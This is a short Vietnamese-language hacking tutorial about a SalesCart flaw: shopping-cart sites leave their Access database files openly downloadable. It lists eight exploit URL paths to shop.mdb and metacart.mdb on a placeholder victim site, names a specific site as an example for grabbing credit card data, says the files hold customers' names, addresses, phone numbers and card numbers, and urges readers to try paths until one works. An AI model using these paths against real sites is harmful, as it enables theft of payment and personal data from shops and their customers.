SalesCart Database Storage Insecurity
trang này đã được đọc lầnTổng quát:
Lỗi này thực chất là dữ liệu của các chương trình mua bán không được bảo mật, mã hóa hay cất giữ cẩn thận nên bạn hoàn toàn có thể lấy chúng một cách dễ dàngKhai thác:
Hãy sử dụng 1 trong những link sau :
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
Ví dụ:
site84vn.com có thể download cc từ đây: www.84vn.com/database/metacart.mdb
Có nghĩa là database không hề có 1 chút bảo mật nào cả. Download vô tư ! Trong
database có thể bao gồm: name, surname, address, e-mail, phone number, credit
card number, company name.....
Bạn có thể khai thác dữ liệu này, nhưng trong thực tế, mọi việc không phải lúc
nào cũng suôn sẻ cả, bạn hãy tưởng tượng mỗi server có một cấu trúc riêng, ví
dụ như đường dẫn không phải lúc nào cũng là fpdb/... hay như những link trên,
hãy tận dụng lỗi và thử từng cái một , nhiều khi là
www.victim.com/muaban/fpdb/shop.mdb vì vậy nếu bạn xài cách này hãy linh
hoạt trong link tuỳ vào từng site!